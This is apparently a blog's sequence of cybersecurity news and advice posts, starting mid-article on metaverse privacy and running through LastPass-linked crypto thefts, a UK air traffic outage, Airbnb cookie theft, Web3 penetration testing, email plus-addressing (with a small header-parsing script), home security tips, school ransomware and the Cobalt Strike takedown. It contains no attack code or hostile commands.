Access credentials are another common item on the illicit market. If hackers obtain your usernames and passwords, they will gain access to your digital life and cause havoc on your social media, emails, and more vital accounts. In virtual worlds and blockchain-based games, rare skins, strong weaponry, and one-of-a-kind artefacts are stolen and sold for real-world cash. 

Finally, private communications containing sensitive information are a bonanza for hackers. They'll try to pry into your personal communications, gathering compromising information to use against you or sell to the highest bidder. 

Mitigation tips 

Since the metaverse has yet to make an appearance, little can be said about how to address these challenges. So far, people's hopes are aligned with Zuckerberg himself. He might develop a robust cybersecurity structure for the metaverse and implement techniques to assure data privacy and security.

However, given the privacy concerns that have emerged as a result of the idea, there are a few ways that users, whether companies or individual netizens, can secure data privacy and security within the metaverse. 

Organisations can govern the use of such information because accumulating personal information and surveillance is not something that anyone other than Facebook can control. Any organisation that establishes virtual offices in the metaverse should have stringent data privacy and security rules in place. Users should be able to control how much personal information they are willing to reveal. 

Aside from that, organisations using AR/VR devices or platforms should rigorously monitor the risks of hacking attacks, data breaches, and other hostile attacks. Similarly, these organisations will need to plan ahead of time for hostile AI attacks and enable defence against them. 

Individual users who join the metaverse should be cautious about the amount and type of information they reveal. Furthermore, it is critical that they implement internet security measures meant to safeguard customers from privacy intrusions and data breaches.

LastPass Security Breach Linked to Series of Crypto Heists, Say Experts

 

Security experts allege that some of the LastPass password vaults, which were stolen in a security breach towards the end of 2022, have now been successfully breached, leading to a series of substantial cryptocurrency thefts. 

According to cybersecurity blogger Brian Krebs, a group of researchers has uncovered compelling evidence linking over 150 victims of crypto theft to the LastPass service. The combined value of the stolen cryptocurrency is estimated to be over $35 million, with a frequency of two to five high-value heists occurring each month since December 2022.

Taylor Monahan, the lead product manager at MetaMask, a cryptocurrency wallet company, and a prominent figure in the investigation, noted that the common denominator among the victims was their prior use of LastPass to safeguard their "seed phrase" – a confidential digital key necessary to access cryptocurrency investments. 

These keys are typically stored on secure platforms like password managers to thwart unauthorized access to crypto wallets. Furthermore, the pilfered funds were traced to the same blockchain addresses, further solidifying the connection between the victims.

LastPass, a password management service, experienced two known security breaches in August and November of the previous year. 

During the latter incident, hackers utilized information acquired from the first breach to gain access to shared cloud storage containing customer encryption keys for vault backups. We have contacted LastPass to verify if any of the stolen password vaults have indeed been breached and will provide an update if we receive a response.

LastPass CEO Karim Toubba informed The Verge in a statement that the security breach in November is still under active investigation by law enforcement and is also the subject of pending litigation. The company did not confirm whether the 2022 LastPass breaches are related to the reported crypto thefts.

Researcher Nick Bax, who holds the position of Director of Analytics at crypto wallet recovery company Unciphered, also examined the theft data and concurred with Monahan’s conclusions in an interview with KrebsOnSecurity:

“I’m confident enough that this is a real problem that I’ve been urging my friends and family who use LastPass to change all of their passwords and migrate any crypto that may have been exposed, despite knowing full well how tedious that is.”

Flight Data Issues Trigger UK Air Traffic Control Failure

 

A significant air traffic control malfunction resulted in extensive flight disruptions, leaving numerous passengers stranded both domestically and internationally. The root cause of this disruption was attributed to issues with the reception of flight data.

Martin Rolfe, the CEO of National Air Traffic Services (Nats), disclosed that the primary and backup systems experienced a suspension of automatic processing during the incident. In his statement, Mr. Rolfe clarified that there is no evidence to suggest that the malfunction was the result of a cyber-attack.

Furthermore, Mr. Rolfe sought to provide assurance by emphasizing that all Nats systems have been operating normally since Monday afternoon, effectively supporting the seamless functioning of airlines and airports.

He said: ‘Very occasionally technical issues occur that are complex and take longer to resolve. In the event of such an issue our systems are designed to isolate the problem and prioritise continued safe air traffic control. This is what happened yesterday. At no point was UK airspace closed but the number of flights was significantly reduced. Initial investigations into the problem show it relates to some of the flight data we received.’

‘Our systems, both primary and the back-ups, responded by suspending automatic processing to ensure that no incorrect safety-related information could be presented to an air traffic controller or impact the rest of the air traffic system.’

The trouble began on Monday when over 25% of flights at UK airports faced cancellations.

Nats encountered what they labeled as a 'technical glitch,' rendering them unable to automatically process flight plans. Consequently, flights to and from UK airports were subject to restrictions while manual checks were conducted on these plans.

Although Nats reported the issue resolved at 3.15 pm on Monday, the disruption persisted into Tuesday due to aircraft and crews being displaced.

An analysis of flight data websites conducted by the PA news agency revealed that on Tuesday, a minimum of 281 flights, encompassing both departures and arrivals, were canceled at the UK's six busiest airports. Specifically, there were 75 cancellations at Gatwick, 74 at Heathrow, 63 at Manchester, 28 at Stansted, 23 at Luton, and 18 at Edinburgh.

In response to the air traffic control malfunction, EasyJet announced its plans to operate five repatriation flights to Gatwick and deploy larger aircraft on crucial routes.

It said: ‘During this traditionally very busy week for travel, options for returning to the UK are more limited on some routes and so easyJet will be operating five repatriation flights to London Gatwick over the coming days from Palma and Faro on August 30, and Tenerife and Enfidha on August 31 and from Rhodes on September 1.

‘We are also operating larger aircraft on key routes including Faro, Ibiza, Dalaman and Tenerife to provide some additional 700 seats this week.’

New Study Reveals Airbnb as a Haven for Cybercrime

 

Cybercriminals have been increasingly using the Airbnb network for illicit activities. New research by cybersecurity experts at SlashNext uncovered the methods employed by these malicious actors to hack user accounts and benefit from stolen data. 

Due to its global ubiquity and reputation for offering travellers affordable lodging, Airbnb—a household name in the travel industry—has become a prime target. SlashNext clarified, however, that this same accessibility has allowed cybercriminals to take advantage of the system and exploit it for their own purposes.

Stealers are at the heart of these cyber-attacks, infiltrating devices and accumulating sensitive information such as login credentials. This stolen data is subsequently sent to the attackers, allowing them to gain unauthorised access to user accounts. The research sheds light on the numerous access points employed by cybercriminals, ranging from software flaws to social engineering techniques.

The study also uncovered an underground marketplace where cybercriminals buy and sell bulk access to hacked devices (also known as bots, installs, or infections). This enables thieves to rapidly deploy malicious software on a large scale, broadening the scope of their attacks.

Session cookies play a crucial role among the strategies used by cybercriminals to obtain unauthorised access to user accounts. These tiny files, which frequently provide momentary website access, record browsing habits and user preferences. 

Cybercriminals acquire stolen Airbnb account cookies from darknet marketplaces, enabling them to get access without having to use legitimate usernames and passwords. Even though these cookies are short-lived, attackers quickly take advantage of the stolen access they provide. 

The investigation also shows how the stolen data was sold. Online forums and digital marketplaces are used by cybercriminals to sell stolen cookies and compromised account information to interested parties. Each compromised Airbnb account apparently has had its value reduced to as little as one dollar due to the scope of the account theft. 

This research emphasises how crucial it is to comprehend the constantly evolving tactics used by cybercriminals as well as the weaknesses they prey upon. It serves as a reminder that even well-known services like Airbnb might include unreported dangers, mandating more user knowledge and proactive security measures.

Why Web3 Penetration Testing is Vital for Protecting Decentralized Systems

 

Web3, the transformative evolution of the internet, has introduced a new era of decentralization, opening up exciting opportunities for applications, transactions, and interactions. With a strong focus on user control, data integrity, and transparency, Web3 technologies are reshaping the digital realm.

In the midst of this groundbreaking shift, ensuring the security of decentralized applications (dApps), smart contracts, and blockchain networks has become a critical concern. The task of maintaining transaction integrity, smart contract reliability, and user data protection has become more intricate and crucial than ever.

In a landscape where traditional cybersecurity measures might not suffice due to the unique features of decentralized systems, Web3 Penetration Testing emerges as a vital defense mechanism.

As reliance on decentralized technologies continues to surge, the necessity for robust security practices is evident. This article delves into the realm of Web3 Penetration Testing, shedding light on its significance, methodologies, and its role in reinforcing the security of Web3 applications. Let’s explore how this specialized testing is shaping the security landscape of Web3, ensuring that the vision of a decentralized future remains both revolutionary and secure.

The Significance of Web3 Penetration Testing

In the face of the paradigm shift brought about by Web3 technologies, the importance of robust cybersecurity has never been more apparent. In this context, Web3 Penetration Testing emerges as a crucial defense against the evolving threats within decentralized applications (dApps), smart contracts, and blockchain networks.

Differing from traditional penetration testing that might overlook the intricacies of decentralization, Web3 Penetration Testing is tailor-made to tackle the unique challenges and vulnerabilities inherent in this novel ecosystem.

  • Securing the Decentralized Horizons
Security takes center stage in the world of Web3 technologies. Web3 Penetration Testing plays a pivotal role in securing decentralized applications (dApps), smart contracts, and blockchain networks.

This specialized assessment addresses the unique security hurdles posed by decentralization. Unlike conventional penetration testing, it navigates the complexities of blockchain networks and dApps. By simulating real-world attacks, it exposes vulnerabilities that could potentially result in unauthorized access, data breaches, and financial losses.

Failing to address these security concerns can lead to substantial risks, including harm to reputation and financial setbacks. As the promise of decentralization gains prominence, Web3 Penetration Testing stands as a vital stride toward bolstering the foundations of this transformative technology.

  • Traversing the Security Landscape
Web3 Penetration Testing is a specialized and indispensable security evaluation tailored for the nuances of Web3 technologies. Its primary goal is to meticulously assess the security readiness of decentralized applications (dApps), smart contracts, and the intricate blockchain networks that constitute the Web3 ecosystem.

At its core, Web3 Penetration Testing simulates real-world attacks to uncover vulnerabilities that could potentially be exploited by malicious actors. Unlike traditional penetration testing, which might not address the nuanced challenges of decentralization, Web3 Penetration Testing is uniquely designed to tackle the specific security concerns that arise in the context of blockchain networks and decentralized systems.

Through a systematic process of probing and analysis, this form of testing identifies potential entry points, vulnerabilities, and weaknesses. It provides actionable insights that empower organizations to enhance the resilience of their Web3 solutions and effectively guard against a wide array of security risks.

  • Addressing Decentralization's Uniqueness
Web3 Penetration Testing goes beyond conventional testing methods by honing in on the distinctive intricacies presented by decentralized systems. Unlike traditional penetration testing, which might disregard the complexities of blockchain networks and decentralized applications (dApps), Web3 Penetration Testing is purpose-built to navigate this evolving terrain.

The decentralized nature of Web3 introduces novel challenges—smart contract vulnerabilities, blockchain consensus mechanisms, and intricate interactions between components—all of which demand a specialized approach. Web3 Penetration Testing rises to this challenge, scrutinizing the security layers specific to decentralized systems.

In doing so, it uncovers vulnerabilities that might otherwise remain concealed. By simulating attacks and considering the nuances of blockchain technology, this form of testing ensures a comprehensive evaluation. As a result, organizations gain a deep understanding of their security gaps and receive tailored recommendations to fortify their Web3 solutions.

  • Navigating Complexities for Strong Security
Decentralized applications (dApps) and smart contracts are at the forefront of the Web3 revolution. However, they also introduce a unique set of security challenges. Smart contracts, while immutable, are not impervious to coding flaws. Blockchain networks, while secure by design, can still be susceptible to vulnerabilities.

Web3 Penetration Testing serves as the crucial shield against these challenges. It delves deeply into dApps and smart contracts, identifying vulnerabilities that could lead to unauthorized access or tampering. By proactively addressing these issues, organizations can prevent potential breaches and safeguard sensitive data.

The realm of Web3 technologies necessitates stringent security measures. Neglecting these challenges can result in financial losses, reputation damage, and compromised user trust. As the digital landscape becomes increasingly decentralized, the significance of robust Web3 Penetration Testing cannot be emphasized enough.

  • Mitigating Risks and Upholding Trust
Overlooking security within the Web3 landscape comes with significant risks. An insecure decentralized application (dApp) can expose user data, facilitate unauthorized transactions, and undermine the integrity of smart contracts. Such vulnerabilities can result in not only financial losses but also harm to an organization’s reputation.

This is where Web3 Penetration Testing comes in—a proactive defense against these risks. By identifying and rectifying vulnerabilities before they can be exploited, organizations can avoid financial setbacks and preserve their standing within the Web3 ecosystem.

The potential financial losses stemming from security breaches are compounded by the erosion of user trust. In the interconnected realm of Web3 technologies, the consequences of a breach can propagate swiftly, causing users to lose confidence in the technology and tarnishing an organization’s image.

  • Strengthening the Future of Decentralization

Web3 Penetration Testing emerges as a cornerstone in the secure evolution of the digital landscape. In the world of decentralized applications (dApps), smart contracts, and blockchain networks, its significance cannot be overstated.

This specialized security assessment zeroes in on the intricacies of Web3 technologies. It goes beyond traditional testing methodologies, unveiling vulnerabilities unique to decentralization. By simulating real-world attacks, Web3 Penetration Testing uncovers security gaps that could lead to unauthorized access, data breaches, and even financial losses.

Neglecting security within the Web3 landscape exposes organizations to multifaceted risks, financial setbacks, reputation damage, and erosion of user trust. With the promise of a decentralized future on the horizon, safeguarding the integrity of Web3 applications and networks becomes paramount.

Web3 Penetration Testing emerges as a potent ally in this endeavor, safeguarding against vulnerabilities that could compromise the very essence of decentralized systems.

By methodically probing decentralized applications, scrutinizing smart contracts, and dissecting blockchain networks, Web3 Penetration Testing reveals concealed vulnerabilities and offers solutions for rectification. Its role surpasses that of traditional security assessments, addressing the distinct challenges of the Web3 ecosystem.

As organizations delve deeper into the realm of decentralized technologies, the need to prioritize security becomes paramount. This article encourages readers to weave security into the fabric of their Web3 applications, advocating for regular assessments, proactive measures, and collaboration with Web3 Security Experts. By embracing these principles, organizations can confidently navigate the intricate Web3 landscape, fostering trust among users and bolstering the future of decentralized innovation.

How to Tell if a Company Is Selling Your Email Address

 

Have you ever signed up for a new website and then all of a sudden started getting emails from businesses and service providers you had never heard of? If so, there is a very good chance that your data has been sold. 

These days, selling your information to data brokers and other interested parties can bring in a lot of money for businesses because data is a valuable commodity. Although this unwanted spam is bothersome, don't worry. 

We'll demonstrate how to avoid spam and shady websites in this article. The following method also works with Outlook and iCloud if you don't use Gmail. 

How to identify the parties selling your data 

Your personal Gmail address has numerous variants, which you might not be aware of yet. You can create a variant simply by inserting a "+" followed by a word or number before "@gmail.com". All email sent to this new variant will still arrive in your mailbox as usual. 

This technique makes it very simple to find out how and by whom your data has been shared. Almost too wonderful to be true? We'll explain that it's actually quite easy.

You must enter your email address when signing up for an online service, store, or other website. With this method, instead of your original Gmail address you enter a variant that adds a "+" followed by the name of the service or website. 

For instance, you can log in using "dennis+firma1@gmail.com" rather than "dennis@gmail.com". You'll be able to pinpoint precisely who they may have given your data to while still receiving all emails from that provider or service to your regular mailbox. 

Therefore, if you sign up with "Firma1" and shortly afterwards receive spam emails from companies 2, 3, and 4 that you have never heard of or registered with, you can easily pinpoint the offender. You'll see your email address under "To" if you open one of these spam emails in your inbox. 

In this case, if it reads "dennis+firma1@gmail.com," you may be certain that this provider has sold your data to company 2, which is currently spamming you. Just unsubscribe and remove these spam emails from your inbox to quickly fix this.
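The tagging trick above can be checked automatically over a mailbox export. The script below is an added example, not part of the original post: it takes a few constructed From/To header pairs, pulls the plus tag out of each "To" address, and reports every sender domain that used a tag other than the service it was created for. The domains, tags and the REGISTERED mapping are all made up for the demonstration.

```python
"""Added example (not from the original post): trace which service leaked a
plus-addressed Gmail alias, using a few constructed message headers."""
import re
from email.utils import parseaddr

# Constructed sample headers: each entry is (From, To) as they would appear
# in the inbox. The plus tag records which service the address was given to.
SAMPLE_MESSAGES = [
    ("Firma1 <newsletter@firma1.example>", "dennis+firma1@gmail.com"),
    ("Great Offers <promo@company2.example>", "dennis+firma1@gmail.com"),
    ("Company3 <deals@company3.example>", "Dennis <dennis+firma1@gmail.com>"),
    ("Shop <orders@shop2.example>", "dennis+shop2@gmail.com"),
    ("Bank <alerts@bank.example>", "dennis@gmail.com"),
]

# Services the address was actually registered with (constructed):
# plus tag -> sender domain expected for that service.
REGISTERED = {
    "firma1": "firma1.example",
    "shop2": "shop2.example",
}

_PLUS_RE = re.compile(r"^(?P<local>[^+@]+)\+(?P<tag>[^@]+)@(?P<domain>.+)$")


def split_plus_address(address):
    """Return (base_address, tag) for a plus-addressed mailbox.

    'dennis+firma1@gmail.com' -> ('dennis@gmail.com', 'firma1');
    an address without a tag returns (address, None).
    """
    _, addr = parseaddr(address)  # strips a display name such as 'Dennis <...>'
    m = _PLUS_RE.match(addr.lower())
    if not m:
        return addr.lower(), None
    return f"{m.group('local')}@{m.group('domain')}", m.group("tag")


def sender_domain(from_header):
    """Domain part of the From header, lower-cased."""
    _, addr = parseaddr(from_header)
    return addr.rsplit("@", 1)[-1].lower()


def find_leaks(messages, registered):
    """Map each plus tag to the unexpected sender domains that used it.

    A tag used by a sender other than the service it was created for means
    that service (or one of its partners) passed the address on.
    """
    leaks = {}
    for from_header, to_header in messages:
        _, tag = split_plus_address(to_header)
        if tag is None or tag not in registered:
            continue  # untagged or unknown tag: nothing to attribute
        domain = sender_domain(from_header)
        if domain != registered[tag]:
            leaks.setdefault(tag, set()).add(domain)
    return leaks


if __name__ == "__main__":
    for tag, domains in find_leaks(SAMPLE_MESSAGES, REGISTERED).items():
        print(f"address given to '{tag}' is now used by: "
              f"{', '.join(sorted(domains))}")
```

On the sample data the only flagged tag is "firma1", used by company2.example and company3.example, which is exactly the case the article walks through.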

Companies exploiting loopholes

Yes, under very rare scenarios, businesses are allowed to sell specific data; email address trading is particularly common. Generally, by adopting a service's or website's privacy policy, you intentionally or unknowingly consent to the transfer of your data to third parties.

Due to the notice being buried in the statement and the fact that most people don't read it all the way through, this happens frequently to users. 

The aforementioned technique is thus especially suitable for determining which service—whether with or without your knowledge—discloses your address information to other parties.

Safeguard Your Home Against Rising Cyber Threats, Here's All You Need To Know

 

Malicious cyber actors have the ability to exploit vulnerable networks within households, potentially compromising personal and private information of family members, including children and elders.

In today's highly connected world, it is crucial to prioritize cybersecurity and take proactive steps to protect your household from cyber threats.

Educating your children and elders about the significance of safeguarding personal information, using strong passwords, and understanding cybersecurity best practices can significantly reduce the risk of falling victim to cyberattacks. 

As the threat landscape continues to evolve, safeguarding your household from malicious actors becomes paramount. To protect your family from cyber threats, consider implementing the following measures:

1. Manage your routing devices:
  • Keep your devices up-to-date with the latest firmware and software.
  • Secure your home network by using unique router usernames and strong passwords.
  • Create a separate guest network for visitors.
  • Change passwords regularly and schedule weekly router reboots.

2. Secure laptops, computers, and web devices:
  • Cover cameras when not in use to prevent unauthorized access.
  • Utilize non-admin accounts for everyday activities.
  • Regularly update operating systems and apply security patches.
  • Disconnect devices from the internet when not in use.
  • Enable multi-factor authentication or use passkeys where possible.
  • Schedule weekly reboots for added security.

3. Manage home assistants:
  • Be aware of which devices in your home have listening capabilities.
  • Avoid having sensitive conversations near home assistants.
  • Mute their microphones when not in use.
  • Review and understand the terms and conditions before accepting them blindly.

Additionally, it is crucial to protect senior relatives from cyberattacks, as they are often targeted for financial frauds due to their limited exposure to technology. 

Educate seniors about common scams and advise them to send unknown calls to voicemail, use credit freezes, and set strict privacy settings on social media. Legal tools such as living trusts, guardianships, or power of attorney can also be utilized to safeguard seniors from scammers.

When teaching children about cybersecurity, instill good cyber hygiene and privacy practices from an early age. Use cybersecurity games and resources suitable for their age group to impart knowledge effectively. 

Beyond passwords and privacy, educate children about verifying online information and identifying phishing and smishing attempts. Encourage them to be mindful of their privacy settings on social media platforms to prevent cyberbullying and protect their personal information.

By adopting these cybersecurity practices and fostering a cybersecurity-conscious environment, you can significantly enhance the safety and security of your family in the digital world.

Schools: Prime Targets for Hackers Amid Poor Cybersecurity and Ransom Payments

 

New data indicates that school districts have become highly susceptible to online exploitation, emerging as the primary target for hackers. According to a recent global survey conducted by the British cybersecurity company Sophos, a staggering 80% of schools experienced ransomware attacks last year, representing a significant increase from the 56% reported in 2021. This doubling of the victimization rate over two years has led researchers to label ransomware as the most significant cyber risk faced by educational institutions today.

Comparing various industries, schools fared the worst in terms of victimization rates, surpassing even sectors like healthcare, technology, financial services, and manufacturing. 

The survey, which included responses from 400 education IT professionals worldwide, revealed that United States institutions are particularly attractive targets for hacking groups, especially since the events surrounding Russia's invasion of Ukraine.

Two factors have made schools especially vulnerable to cyber threats in the United States. First, the cybersecurity measures in educational settings often lag behind those in major businesses, such as banks and technology companies. Second, schools prove to be easy targets for exploitation due to their willingness to pay ransoms. 

Last year, nearly half of the attacks on schools resulted in ransom payments, further enticing threat actors. Unfortunately, this combination of weak defenses and a readiness to pay has made schools a "double whammy" for hackers, according to Chester Wisniewski, the field chief technology officer of applied research at Sophos.

The motivation to pay ransoms seems to be influenced by insurance coverage. In districts with standalone cyber insurance, 56% of victims paid the ransom, while those with broader insurance policies covering cybersecurity saw a payment rate of 43%. Insurance companies often cover ransom demands, giving them significant sway over which districts comply with the extortion demands.

Elder, a school representative, acknowledges the difficult decisions schools face when dealing with ransomware attacks. While it is essential to safeguard confidential information and protect people, the pressure to manage resources and finances can make the choice challenging.

Ultimately, the data suggests that schools must prioritize and strengthen their cybersecurity practices to avoid falling prey to hackers and ransom demands. 

Relying on insurance alone may not provide a comprehensive solution, as hackers continue to exploit vulnerabilities, and insurance companies struggle to keep pace with evolving threats.

Here's How Microsoft Fought Against Ireland's HSE Attackers

 

After luring a worker with a phishing email and a malware-laced spreadsheet, hackers used the victim's infected computer to access Ireland's public health system and tunnel across the network for weeks. Infecting thousands more systems and servers, they prowled from hospital to hospital, explored folders, and opened personal files. 

By the time they demanded a ransom, they had already taken over more than 80% of the IT infrastructure, knocked out systems for the organisation's 100,000+ employees, and put the lives of thousands of patients in danger.

The attackers employed a "cracked," or exploited and unauthorised, legacy version of a powerful tool to launch the 2021 attack on Ireland's Health Service Executive (HSE). The tool, which is used by legitimate security professionals to simulate cyberattacks in defence testing, has also become a favourite of criminals who steal and manipulate older versions to launch ransomware attacks around the world. Over the past two years, hackers have attempted to infect over 1.5 million devices using cracked copies of the tool, Cobalt Strike. 

However, Microsoft and the tool's owner, Fortra, now have a court order authorising them to seize and block infrastructure associated with cracked versions of the software. The order also permits Microsoft to interrupt infrastructure linked with the misuse of its software code, which thieves have utilised in some of the attacks to disable antivirus systems. Since the order was carried out in April, the number of compromised IP addresses has decreased dramatically. 

"The message we want to send in cases like these is: 'If you think you're going to get away with weaponizing our products, you're going to get a rude awakening,'" states Richard Boscovich, assistant general counsel for Microsoft's Digital Crimes Unit (DCU) and head of the unit's Malware Analysis & Disruption team. 

The effort to take down cracked Cobalt Strike began in 2021, when DCU — a diverse, multinational organisation of cybercrime fighters — aimed to make a deeper dent in the rising number of ransomware attacks. Previous operations had separately targeted particular botnets such as Trickbot and Necurs, but ransomware investigator Jason Lyons advocated a large operation targeting multiple malware groups and focusing on what they all had in common: the usage of cracked, old Cobalt Strike. 

"We kept seeing cracked Cobalt Strike as the tool in the middle being leveraged in ransomware attacks," Lyons explained, basing his evaluations on internal information about Windows-based attacks. 

Lyons, a former US Army counterintelligence special agent, had spent many nights and weekends responding to ransomware attacks and breaches. The opportunity to pursue multiple crooks at once allowed him to "bring a little pain to the bad guys and interrupt their nights and weekends, too," he adds.

But before it could start inflicting pain, Microsoft needed to clean up its own house and get rid of the cracked Cobalt Strike in Azure. Rodel Finones, a reverse engineer who deconstructs and analyses malware, jumped to work right away. He had transferred from the Microsoft Defender Antivirus team to DCU a few years earlier in order to play a more proactive role in combating criminality. 

Finones designed a crawler that connected to every active, publicly accessible Cobalt Strike command-and-control server on Azure — and, ultimately, the internet. The servers communicate with infected devices, enabling operators to spy on networks, move laterally, and encrypt information. He also began looking into how ransomware criminals used Microsoft's technologies in their operations. 

Crawling, though, was insufficient. The investigators had a difficult time distinguishing between legitimate security uses of Cobalt Strike and unlawful use by threat actors. Fortra assigns a unique licence number, or watermark, to each Cobalt Strike kit sold, which serves as a forensic clue in cracked copies. However, the corporation was not involved in the first operation, and DCU investigators worked alone to create an internal catalogue of watermarks associated with customer attacks while cleaning up Azure. 

Meanwhile, Fortra, which purchased Cobalt Strike in 2020, was addressing the issue of criminals exploiting cracked copies. When Microsoft proposed a joint venture, the corporation needed time to ensure that working with Microsoft was the appropriate decision, according to Bob Erdman, assistant vice president for business development. 

In early 2023, Fortra joined the action and released a list of over 200 "illegitimate" watermarks linked to 3,500 unauthorised Cobalt Strike servers. The company had been doing its own investigations and implementing new security procedures, but teaming with Microsoft allowed access to scale, extra knowledge, and an additional method of protecting its tool and the internet. Fortra and Microsoft examined around 50,000 distinct copies of cracked Cobalt Strike during the inquiry. 

Microsoft benefited from the collaboration as well, with Fortra's knowledge and watermark list significantly expanding the operation's reach. It aided the firms' case, which linked malicious infrastructure to 16 unknown defendants, each representing a unique threat group. 

Lawyers argued that the groups – ransomware authors, extortionists, victim lurers, and cracked Cobalt Strike sellers – collaborated in a thriving, profitable ransomware-as-a-service operation aimed at maximising profit and harm. They also linked cracked Cobalt Strike to eight ransomware families, including LockBit, a quick encryption and denial-of-service attacker, and Conti, the malware suspected in the disastrous 2022 attacks on the Costa Rican government.